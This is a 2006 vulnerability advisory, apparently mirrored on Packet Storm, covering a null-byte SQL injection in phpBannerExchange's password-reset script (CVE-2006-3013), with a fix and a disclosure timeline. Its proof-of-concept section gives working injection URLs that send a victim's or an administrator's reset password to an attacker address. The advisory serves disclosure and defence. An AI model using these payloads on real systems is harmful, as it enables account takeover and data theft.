exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

rt-sa-2006-005.txt

rt-sa-2006-005.txt
Posted Jun 25, 2006
Authored by RedTeam Pentesting | Site redteam-pentesting.de

RedTeam has identified a SQL injection that can be triggered due to a lack of user input sanitization in phpBannerExchange versions 2.0 RC5 and below. It is possible to recover a password of a user and thereby overtake his account.

tags | exploit, sql injection
advisories | CVE-2006-3013
SHA-256 | 6ba2021069dae4cc4deafb57eec1782f8dfa9bd1d74db02264d59185289236ed

rt-sa-2006-005.txt

Change Mirror Download
Advisory: Unauthorized password recovery in phpBannerExchange

RedTeam identified an SQL injection that can be triggered due to a bad
user input sanitization in phpBannerExchange. It is possible to recover
a password of an user and thereby overtake his account.


Details
=======

Product: phpBannerExchange
Affected Versions: All versions up to phpBannerExchange 2.0 RC5
Fixed Versions: 2.0 RC6
Vulnerability Type: Bad user input sanitization, SQL injection
Security-Risk: medium
Vendor-URL: http://www.eschew.net/scripts/phpbe/2.0/
Vendor-Status: informed, fixed version released
Advisory-URL: http://www.redteam-pentesting.de/advisories/rt-sa-2006-005.txt
Advisory-Status: public
CVE: CVE-2006-3013
CVE-URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3013


Introduction
============

From the vendor's homepage:
phpBannerExchange is a PHP/mySQL script that allows virtually anyone
with minimal knowledge of PHP, mySQL and web hosting to run their own
banner exchange.


More Details
============

If a user forgot the password of his phpBannerExchange account, he
can reset it by supplying his email address.
In "resetpw.php" the variable $email contains this email address,
which is then validated by a regular expression.

[...]
42 if(!eregi("^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*
(\.[a-z]{2,3})$", $email)){
[...]

Due to a bug in the implementation of eregi(), it is possible to pass
additional characters by using a Null Byte "\0". Because the backend
of eregi() is implemented in C, $email is treated as a zero-terminated
string. All characters starting from the Null Byte on will not be
recognized by the regular expression. Therefore you can pass an email
address, that includes the special character "'" to break the following
SQL query:

[...]
48 $get_info=mysql_query("select * from banneruser where
email='$email'");
[...]

After that, a new password for the chosen user is generated and sent via

[...]
68 mail($email,$usrsubject,$usrcontent,"From: $ownermail");
[...]

Note that mail() will treat $email as a zero-terminated string, too.
Thereby, an attacker can reset the password of a user account and send
it to his own email address.


Proof of Concept
================

Use following URLs with your favorite web browser:

http://example.com/phpbe/resetpw.php?
submit=&email=attacker@example.com%00'or email='victim@example.com

to retrieve the password of the user with the email address
"victim@example.com" or

http://example.com/phpbe/resetpw.php?
submit=&email=attacker@example.com%00'or id='1

to retrieve the password of the user with user id "1".


Workaround
==========

Use PHP Magic Quotes.


Fix
===

Upgrade to version 2.0 RC6


Security Risk
=============

The security risk is high because an attacker could gain access to an
administrator account and view and alter the database and hereby compromise
the whole application.


History
=======

2006-06-09 Discovery of the problem
2006-06-10 Vendor is informed
2006-06-12 Vendor released fixed version

References
==========

[1] http://www.eschew.net/scripts/phpbe/2.0/


RedTeam
=======

RedTeam Pentesting is offering individual penetration tests, short
pentests, performed by a team of specialised IT-security experts.
Hereby, security weaknesses in company networks are uncovered and can be
fixed immediately.

As there are only few experts in this field, RedTeam wants to share its
knowledge and enhance the public knowledge with research in security
related areas. The results are made available as public security
advisories.

More information about RedTeam can be found at
http://www.redteam-pentesting.de.

--
RedTeam Pentesting Tel.: +49-(0)241-963 1300
Dennewartstr. 25-27 Fax : +49-(0)241-963 1304
52068 Aachen http://www.redteam-pentesting.de
Login or Register to add favorites

File Archive:

December 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    2 Files
  • 2
    Dec 2nd
    12 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close